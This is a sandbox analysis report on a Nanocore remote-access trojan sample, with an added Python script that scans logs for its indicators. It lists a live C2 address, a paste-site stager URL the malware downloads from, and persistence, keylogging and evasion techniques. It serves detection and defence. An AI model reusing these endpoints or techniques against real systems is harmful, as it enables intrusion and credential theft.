
Analysis Report GgNhpv.exe

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 224019
Start date: 21.04.2020
Start time: 00:49:30
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 22s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: GgNhpv.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@37/43@6/3
EGA Information:
  • Successful, ratio: 40%
HDC Information:
  • Successful, ratio: 2.9% (good quality ratio 2.4%)
  • Quality average: 37.5%
  • Quality standard deviation: 20.5%
HCA Information:
  • Successful, ratio: 93%
  • Number of executed functions: 196
  • Number of non-executed functions: 15
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, WMIADAP.exe, MusNotifyIcon.exe
  • Excluded IPs from analysis (whitelisted): 40.127.240.158, 20.44.86.43, 2.18.68.82, 205.185.216.10, 205.185.216.42
  • Excluded domains from analysis (whitelisted): umwatson.trafficmanager.net, fs.microsoft.com, settings-win.data.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, settingsfd-geo.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
  • Execution Graph export aborted for target GgNhpv.exe, PID 3744 because it is empty
  • Execution Graph export aborted for target wpasv.exe, PID 4404 because it is empty
  • Execution Graph export aborted for target wpasv.exe, PID 4684 because it is empty
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy: Threshold
Score: 100 (range 0 - 100)
Whitelisted: false
Threat: Nanocore
Detection: malicious

Confidence

Strategy: Threshold
Score: 5 (range 0 - 5)
Further Analysis Required?: false


Classification Spiderchart

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

The matrix is listed per tactic. A number in parentheses is the count of signatures matched for that technique; techniques without a number are the empty cells of the matrix and were not observed.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link; Spearphishing Attachment; Spearphishing via Service; Supply Chain Compromise
Execution: Windows Management Instrumentation (1); PowerShell (2); Graphical User Interface (1); Command-Line Interface (11); Scheduled Task (1); Graphical User Interface; Scripting; Third-party Software; Rundll32
Persistence: Registry Run Keys / Startup Folder (1); Hidden Files and Directories (1); Scheduled Task (1); System Firmware; Shortcut Modification; Modify Existing Service; Path Interception; Logon Scripts; DLL Search Order Hijacking
Privilege Escalation: Process Injection (12); Scheduled Task (1); Path Interception; DLL Search Order Hijacking; File System Permissions Weakness; New Service; Scheduled Task; Process Injection; Service Registry Permissions Weakness
Defense Evasion: Web Service (1); Software Packing (13); Disabling Security Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Masquerading (1); Hidden Files and Directories (1); Virtualization/Sandbox Evasion (2); Process Injection (12)
Credential Access: Input Capture (11); Network Sniffing; Input Capture; Credentials in Files; Account Manipulation; Brute Force; Two-Factor Authentication Interception; Bash History; Input Prompt
Discovery: System Time Discovery (1); Security Software Discovery (1); System Information Discovery (13); Virtualization/Sandbox Evasion (2); Process Discovery (2); Application Window Discovery (1); Remote System Discovery (1); Network Service Scanning; System Network Connections Discovery
Lateral Movement: Remote File Copy (1); Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software; Pass the Hash; Remote Desktop Protocol; Windows Admin Shares
Collection: Input Capture (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Data Staged; Screen Capture; Email Collection; Clipboard Data; Automated Collection
Exfiltration: Data Encrypted (11); Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over Command and Control Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Physical Medium
Command and Control: Web Service (1); Uncommonly Used Port (1); Remote File Copy (1); Standard Cryptographic Protocol (12); Remote Access Tools (1); Standard Non-Application Layer Protocol (2); Standard Application Layer Protocol (3); Standard Application Layer Protocol; Multilayer Encryption
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

Signature Overview



AV Detection:

Yara detected Nanocore RAT
Source: Yara match | File source: 0000001E.00000002.1158787988.0000000004409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1179468544.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1183711423.0000000003BA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.1156120893.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1186719168.0000000005370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.1158420771.0000000003400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1181971836.0000000002B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 4220, type: MEMORY
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 2072, type: MEMORY
Source: Yara match | File source: 15.2.MSBuild.exe.5370000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.MSBuild.exe.5370000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: GgNhpv.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 15.2.MSBuild.exe.400000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 30.2.MSBuild.exe.400000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7

Spreading:

Creates COM task schedule object (often to register a task for autostart)
CLSID {0F87369F-A4E5-4CFC-BD3E-73E6154572DD} is the Task Scheduler class implemented by taskschd.dll, so these lookups are what any ITaskService client performs before registering a task; they fit the Microsoft.Win32.TaskScheduler.dll and taskschd.dll.mui strings listed under System Summary. The raw log repeats the lookups and writes the CLSID in both upper and lower case; the distinct keys are:
Source: C:\Users\user\Desktop\GgNhpv.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} (4 times)
Source: C:\Users\user\Desktop\GgNhpv.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 (3 times)
Source: C:\Users\user\Desktop\GgNhpv.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs (3 times)
Source: C:\Users\user\Desktop\GgNhpv.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32 (2 times)
Source: C:\Users\user\Desktop\GgNhpv.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler (2 times)
Source: C:\Users\user\Desktop\GgNhpv.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32
Source: C:\Users\user\Desktop\GgNhpv.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer
Source: C:\Users\user\Desktop\GgNhpv.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Elevation

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 15_2_06BB141E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 15_2_06BB145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 15_2_06BB13B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 15_2_06BB13B3

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B, 192.168.2.5:49753 -> 151.80.8.11:9999
Connects to a pastebin service (likely for C&C)
Source: unknown | DNS query: name: paste.ee (5 identical queries)
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.5:49753 -> 151.80.8.11:9999
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /r/yaEzF HTTP/1.1, Host: paste.ee, Connection: Keep-Alive (4 identical requests, no User-Agent header)
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 104.18.49.20
Source: Joe Sandbox View | IP Address: 104.18.48.20 (listed twice)
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /r/yaEzF HTTP/1.1, Host: paste.ee, Connection: Keep-Alive (4 identical requests)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: paste.ee
Urls found in memory or binary data
Most of the URLs below are font-foundry addresses carried in embedded font metadata, and secureteam.net belongs to the vendor of the Agile.NET (CliSecure) .NET protector, whose error-reporting web-service URL the protector embeds in protected assemblies. None of them appears in the observed DNS or HTTP traffic above; the live indicators in this report are paste.ee and 151.80.8.11:9999.
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp | String found in binary or memory: http://google.com
Source: GgNhpv.exe, 00000000.00000002.817723834.0000000002610000.00000004.00000001.sdmp, MSBuild.exe, 0000000F.00000002.1181971836.0000000002B50000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: GgNhpv.exe | String found in binary or memory: http://secureteam.net/ErrorReporting.asmx
Source: GgNhpv.exe | String found in binary or memory: http://secureteam.net/ErrorReporting.asmxY
Source: GgNhpv.exe | String found in binary or memory: http://secureteam.net/webservices/$
Source: GgNhpv.exe | String found in binary or memory: http://secureteam.net/webservices/CreateErrorReport
Source: GgNhpv.exe | String found in binary or memory: http://secureteam.net/webservices/T
Source: GgNhpv.exe | String found in binary or memory: http://secureteam.net/webservices/TU
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: GgNhpv.exe, 00000000.00000003.775478680.000000001B2CB000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.comhr
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: GgNhpv.exe, 00000000.00000002.826616690.000000001C3C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
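The network indicators in this section (the Snort SID 2025019 hit on 151.80.8.11:9999, the paste.ee stager fetch of /r/yaEzF without a User-Agent, the shared addresses 104.18.48.20 and 104.18.49.20, and the non-standard destination port) can be turned into a small matcher run over proxy or connection logs. The script below is an added example and is not part of the Joe Sandbox report; the JSON-lines log format, the sample records, the list of paste services and the set of ports treated as ordinary are assumptions of this example, not facts from the report.

```python
import ipaddress
import json

# Indicators copied from the Networking section of the report.
C2_ENDPOINTS = {("151.80.8.11", 9999)}            # Snort SID 2025019, ET TROJAN Possible NanoCore C2
STAGER_URLS = {("paste.ee", "/r/yaEzF")}           # second stage pulled from a paste service
SHARED_IOC_IPS = {"104.18.49.20", "104.18.48.20"}  # "IP address seen in connection with other malware"

# Assumptions of this example, not taken from the report.
PASTE_SERVICES = {"paste.ee", "pastebin.com", "hastebin.com"}
COMMON_PORTS = {53, 80, 443, 8080, 8443}

# Constructed sample log (JSON lines, one connection or HTTP request per line).
# Timestamps and the benign records are made up; the suspicious ones mirror the report.
SAMPLE_LOG = """\
{"ts": "2020-04-21T00:50:01Z", "src": "192.168.2.5", "dst": "104.18.49.20", "dport": 443}
{"ts": "2020-04-21T00:50:02Z", "src": "192.168.2.5", "dst": "104.18.49.20", "dport": 80, "host": "paste.ee", "path": "/r/yaEzF", "user_agent": null}
{"ts": "2020-04-21T00:50:05Z", "src": "192.168.2.5", "dst": "151.80.8.11", "dport": 9999}
{"ts": "2020-04-21T00:50:09Z", "src": "192.168.2.5", "dst": "203.0.113.10", "dport": 443, "host": "www.example.com", "path": "/", "user_agent": "Mozilla/5.0"}
{"ts": "2020-04-21T00:50:12Z", "src": "192.168.2.5", "dst": "10.0.0.12", "dport": 5985}
"""


def score_event(ev: dict) -> list[str]:
    """Return the reasons a single log record matches; an empty list means no hit."""
    reasons = []
    dst, dport = ev["dst"], int(ev["dport"])
    host, path = ev.get("host"), ev.get("path")

    if (dst, dport) in C2_ENDPOINTS:
        reasons.append("known NanoCore C2 endpoint")
    if (host, path) in STAGER_URLS:
        reasons.append("known stager URL")
    if host in PASTE_SERVICES and not ev.get("user_agent"):
        reasons.append("paste service fetched without a User-Agent")
    if dst in SHARED_IOC_IPS:
        reasons.append("address previously seen with other malware (low confidence: shared CDN)")
    # Generic form of the report's "non-standard ports" signature, restricted to
    # public destinations so that internal services such as WinRM on 5985 stay quiet.
    if dport not in COMMON_PORTS and not ipaddress.ip_address(dst).is_private:
        reasons.append(f"non-standard port {dport} to a public address")
    return reasons


def analyse_log(text: str) -> list[tuple[str, list[str]]]:
    """Run score_event over every JSON line and keep the records that matched."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        reasons = score_event(ev)
        if reasons:
            hits.append((ev["ts"], reasons))
    return hits


if __name__ == "__main__":
    for ts, reasons in analyse_log(SAMPLE_LOG):
        print(ts, "->", "; ".join(reasons))
```

The shared-CDN reason is deliberately marked low confidence: 104.18.x.x addresses are Cloudflare edges that front paste.ee and countless benign sites, so on its own that match should raise a ticket only together with one of the other reasons.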

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a raw input device (often for capturing keystrokes)
Source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp | Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT
The same Yara matches as listed under AV Detection above: eight memory dumps from MSBuild.exe (PIDs 4220 and 2072), the process memory of both PIDs, and the unpacked PE files 15.2.MSBuild.exe.5370000.5.unpack, 15.2.MSBuild.exe.5370000.5.raw.unpack, 15.2.MSBuild.exe.400000.0.unpack and 30.2.MSBuild.exe.400000.0.unpack.

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000F.00000002.1186978223.0000000005400000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000000F.00000002.1188156970.00000000061D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000000F.00000002.1186893874.00000000053D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000000F.00000002.1186233370.00000000050B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000000F.00000002.1186832328.00000000053B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000000F.00000002.1182142774.0000000002BE4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore, author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001E.00000002.1158787988.0000000004409000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore, author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.1186856992.00000000053C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000000F.00000002.1179468544.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000000F.00000002.1179468544.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore, author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore, author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.1187390172.0000000005CC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000001E.00000002.1156120893.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000001E.00000002.1156120893.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore, author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.1186946814.00000000053F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000000F.00000002.1186346502.00000000051C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000000F.00000002.1186719168.0000000005370000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000000F.00000002.1186313236.00000000051B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000000F.00000002.1187296119.0000000005C90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000000F.00000002.1187421494.0000000005CD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000000F.00000002.1187312590.0000000005CA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 0000001E.00000002.1158420771.0000000003400000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore, author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.1184242562.0000000003E31000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore, author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MSBuild.exe PID: 4220, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: Process Memory Space: MSBuild.exe PID: 4220, type: MEMORY | Matched rule: NanoCore, author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MSBuild.exe PID: 2072, type: MEMORY | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: Process Memory Space: MSBuild.exe PID: 2072, type: MEMORY | Matched rule: NanoCore, author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.MSBuild.exe.5c90000.13.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.53d0000.8.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.50b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.53f0000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.53d0000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.5370000.5.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.53c0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.5c90000.13.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.51b0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.51b0000.3.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.5400000.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.61d0000.17.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.53c0000.7.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.5cc0000.15.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.61d0000.17.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.5cd0000.16.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.5370000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.53b0000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.51c0000.4.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.5cc0000.15.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.5ca0000.14.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.5ca0000.14.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.5400000.11.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore, author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.MSBuild.exe.51c0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore, author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.MSBuild.exe.5cd0000.16.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Nanocore RAT, author: Florian Roth
Very long command line found
Source: unknown | Process created: command line size = 11993 (2 times)
Source: unknown | Process created: command line size = 11967 (2 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: command line size = 11967 (2 times)
Detected potential crypto function
Source: C:\Users\user\Desktop\GgNhpv.exe | Code function: 0_2_00007FF7F9A28A32
Source: C:\Users\user\Desktop\GgNhpv.exe | Code function: 0_2_00007FF7F9A22964
Source: C:\Users\user\Desktop\GgNhpv.exe | Code function: 0_2_00007FF7F9A58E12
Source: C:\Users\user\Desktop\GgNhpv.exe | Code function: 0_2_00007FF7F9A212F3
Source: C:\Users\user\Desktop\GgNhpv.exe | Code function: 0_2_00007FF7F9A211F3
Source: C:\Users\user\Desktop\GgNhpv.exe | Code function: 0_2_00007FF7F9A21150
Source: C:\Users\user\Desktop\GgNhpv.exe | Code function: 0_2_00007FF7F9A29A34
Source: C:\Users\user\Desktop\GgNhpv.exe | Code function: 0_2_00007FF7F9A2BC1A
Source: C:\Users\user\Desktop\GgNhpv.exe | Code function: 0_2_00007FF7F9A30B99
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_061D3324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_061D46D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_061D42EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0108E471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0108E480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0108BBD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_02B29788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_02B2F5F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_02B2A5F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_02B2A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06BB6C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06BB2C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06BB1DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06BB6340
